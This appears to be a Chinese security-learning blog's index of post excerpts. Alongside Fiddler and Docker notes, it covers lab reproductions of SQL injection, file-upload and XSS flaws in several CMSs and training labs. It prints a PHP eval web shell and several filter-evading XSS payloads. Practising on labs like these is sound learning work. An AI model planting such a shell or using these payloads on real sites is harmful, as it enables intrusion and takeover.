- 博客(31)
- 资源 (5)
- 收藏
- 关注
RSS订阅
原创 HTTP抓包:Fiddler工具学习-2-进一步优化配置
1.为了便于学习可以暂时的在WIFI网络下把除了要抓取的APP网络全部关闭如:关闭除了微信所有应用的WIFI上网权限,并且关闭数据连接功能。2.为了能够获取APP上的HTTPS请求需进行如下配置:(1 手机访问 http://IP:8888将FiddlerRoot.cer证书安装好。将Fiddler中的抓取位置设置下选择最后一项。这样设置后我们便可以做到抓取目标APP的报文...
2019-09-26 18:05:15
230
原创 HTTP抓包:Fiddler工具学习-1-抓取安卓系统的流量。
1.官网下载链接:点我2.跟着提示安装:应用界面如上学习Fiddler是为了抓取安卓的报文,故设置以下内容并且要勾选这两个并安装上证书开启后需要重启Fiddler并配置防火墙。要用电脑抓取手机的报文需要让电脑和手机在同一个局域网里。等下到有wifi的地方测试下。...
2019-09-26 17:48:36
289
原创 HTML代码学习
任务:请根据给出的需求,在基本模板上完善网页,网页包括首页、登录、注册界面。实现3个页面功能,页面外观请参考给出的具体图片首页代码:<html><body><h1>各位~注意了,这个页面是...是首页</h1> <p><center><a href="regis.html" >注册</...
2019-09-09 18:14:09
1441
原创 今日份鸡汤
1、做决定不要过虑,没有什么决定是完全正确的2、多和有能(比自己优秀的人)交流,学习他们的方法,积极执着的对待自己的目标3、不要在犹豫与徘徊上花费时间(这是找自己的借口),你自己知道自己想要么,在行动中探索(存疑,我觉得完全知道自己的目标就是探索的过程,不然怎么会有试错呢)4、期待意外与挑战5、终身学习,世界是变化的,只有变化的自己才会与社会适应6、负责,对自己负责,不要负他人之责;自...
2019-08-25 19:29:17
273
原创 当黑客就学Docker——个人入门笔记Day5:实战篇
Day5-开始实操虽说是实战,但还是以积累为主。今天呢,我们重点操作以下几个部分:1.更改镜像源(天朝网络问题嘛,你们懂得)2.下载一个镜像3.运行镜像,对容器胡乱操作一番...
2019-08-13 21:33:35
311
原创 当黑客就学Docker——个人入门笔记Day3:镜像操作命令篇
Day3-了解对镜像的常用操作1.官网镜像现存的镜像,绝大部分存储于Docker Hub上,可前往官网查看2.检索镜像docker search mysql
2019-08-11 14:08:40
296
原创 当黑客就学Docker——个人入门笔记Day2:安装篇
Day2-Docker 安装1.下载 ,当然是要下载最新版本啦链接 Centos2.安装Centos学习时的可选项1)安装在自己的物理机上2)安装在VMware3)安装在阿里云服务器上 /腾讯云学生服务器学生购买还是挺便宜的,等到入门的差不多了,我也买一年试试此时,咱们还是先安装在VMware上此处贴上VMware15的链接开始安装:进入时,上下键选择install c...
2019-08-10 16:22:18
357
原创 当黑客就学Docker——个人入门笔记Day0:启示录篇
Day0-认识Docker自己看到这个标题,莫名奇妙想到 0day<点击了解>忽然间思绪万千,当然了,对于吾等新手白帽那还是挺遥远的。不积跬步,无以至千里冲啊!1.为什么当黑客要学Docker呢?2.相比于VMware,Docker有什么优势?3.如何自学Docker?答:1.如果要从事安全行业,实验环境的搭建是必须的,选择有多种,VMware和Docker是最常见的...
2019-08-09 21:04:26
674
原创 当黑客就学Docker——个人入门笔记Day1:概念篇
Day1-认识相关概念1.Docker:是开源应用容器引擎,轻量级容器技术。2.Images 镜像:一个只读模板,可以用来创建容器,一个镜像可以创建多个容器3.Container 容器 :容器是从镜像创建的运行实例,也就是镜像启动后的一个实例称为容器,是独立运行的一个或一组应用。4.Resoisitory 仓库:仓库是集中存放镜像文件的场所,类似 git 代码仓库等。仓库是集中存放镜像文...
2019-08-09 20:37:39
295
原创 当黑客就入门 WordPress插件Ultimate Produce Catalogue 4.2.2 SQL漏洞复现
一、环境选择1.系统环境:Win Server20032.Web环境:Apache+php5.2173.源码选择:WordPress _v4.6<点击下载>4.插件选择:Ultimate Produce Catalogue 4.2.2<点击下载>二、源码部署1.博客系统(Wordpress)的源码的部署将源码解压在WWW下,使用浏览器访问http://靶机I...
2019-08-04 15:48:42
670
原创 当黑客就入门 ZzCMS8.1前台任意脚本上传漏洞复现
一、环境选择1.系统环境:Win server 20032.靶机IP:192.168.220.1323.Web环境:Phpstudy2016 4.源码:ZzCMS8.1<点击下载>二、环境搭建1.将源码放入phpstudy下的WWW文件里2.网站搭建http://192.168.220.132/zzcms8.1/install/按照流程,一步一步安装:...
2019-08-03 15:23:45
2371
原创 当黑客就入门 禅道7.3代码审计
第一步:安装环境下载源码并解压至WWW下访问www下的index.php进行安装第二部:验证漏洞php审计知识->在php中是一个对象操作符比如我有一个类db:class db{public $host;public function printHost(){echo KaTeX parse error: Expected 'EOF', got '}' at posit...
2019-08-03 10:33:22
773
原创 当黑客就入门 易通CMS时间盲注复现
**一、环境搭建**访问index.php进行配置:index.php部分源码if (isset($_GET['departmentid'])) { $departmentid = $_GET['departmentid']; $activity_sql = "SELECT `id` FROM `".$config['prefix']."activity...
2019-08-01 14:46:39
372
原创 当黑客就入门 ZenTaoPMS.6.2.stable任意文件上传漏洞复现
将源文件移动到phpstudy文件夹里,并解压mv ZenTaoPMS.6.2.stable.zip /phpstudy/www/ unzip ZenTaoPMS.6.2.stable.zip访问原文件http://127.0.0.1/zentaopms/www/install.php
2019-08-01 10:27:28
730
原创 当黑客就入门 Upload-Labs 1-5关
小马代码<?php eval(@$_POST['a']); ?>或者使用<?phpecho "Hello world!";?>Pass-01Pass-02Pass-03Pass-04Pass-05**
2019-07-23 16:21:22
561
原创 当黑客就入门 XSS-Lab第九关
第一关:判断是否存在注入漏洞第二关:尝试利用该漏洞所以构造Payload,使用html实体编码,引入正常的url并对此进行注释javascript:alert(1)/*http://www.baidu.com*/...
2019-07-21 22:20:07
660
原创 当黑客就入门 XSS-Lab第八关
**第一步:判断是否存在漏洞****第二部:尝试利用该漏洞**查看你源码可以看到,做了多种编码。尝试使用其他的编码的形式对script中的一个字母进行html实体编码HTML实体编码(HEX)javascript:alert()HTML实体编码(DEC)javascript:alert()...
2019-07-21 22:06:40
1165
原创 当黑客就入门 XSS-Lab第七关
第一步:判断是否存在注入漏洞第二步:尝试使用该漏洞任意Payload:1987"><scrSCRIPTipt>alert('Yes')</scrSCRIPTipt>构造方法如下比如被过滤的是on 那么先写一个给他过滤,然后外围拆开再另外写一个oONn 过滤后为onscrSCRIPTipt 过滤后为scrip...
2019-07-20 14:04:24
199
原创 当黑客就入门 XSS-Lab第六关
第一步:判断是否存在XSS注入漏洞输入的关键词有进行回显,故存在XSS漏洞**第二步:尝试利用该漏洞**尝试对输入的关键词进行大小写1987" ONinput="alert(1987)"> <a Href="javascript:alert('test')">link</a>总结:此题为对关键词和符号的黑名单形式,可以通过对部分字符进行大小...
2019-07-20 13:35:06
283
原创 当黑客就入门 XSS-Lab第五关
第一步:判断是否存在漏洞输入的内有有回显,故存在漏洞第二步:尝试利用漏洞Payload:1987"><script>alert("yes")</script>现象:使用html事件进行尝试:1987"oninput=“alert('yes')构造一个Payload闭合闭合原标签,重新创建一个a标签a标签中引入一个script超链接来调用弹窗...
2019-07-19 23:47:12
532
原创 当黑客就入门 XSS-Lab第四关
**第一步:判断是否漏洞**第二步:尝试利用该漏洞Payload如下:1987"oninput="alert('Yes')#因为源码中显示的是双引号,故此处的闭合符合也选择双引号。...
2019-07-19 15:43:53
643
原创 当黑客就入门 XSS-Lab第三关
第一步:判读是否有注入漏洞第二步:尝试利用该漏洞经过Burp查看后,除了跳转并无其他变化,只能看下源码不能script代码,转变方向,使用表单中的事件来调用alert()构成<input name=keyword value="1987"οnmοuseοver=“alert(‘Yes’)”>...
2019-07-19 10:52:21
668
1
原创 当黑客就入门 XSS-Lab第二关
第一步:尝试,判断是否有XSS漏洞可以利用第二部:尝试注入。</h2><script>alert('Yes')</script><h2>网页查到HTML使用的过滤函数为HtmlSpecialChars,其函数作用,是将预定义字符转化为html实体,使用Burp查看构造Payload如下html><script>al...
2019-07-18 23:02:50
265
原创 当黑客就入门 XSS-Lab第一关
第一步:F12查看源码**第二步:尝试更改参数,验证猜测。****第三步:验证成功,开始写Payload****第四步:观察现象,完成任务。**
2019-07-18 18:49:47
324
f59e9785b70a56479703c26e346457da-ultimate-product-catalogue.zip
2019-08-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人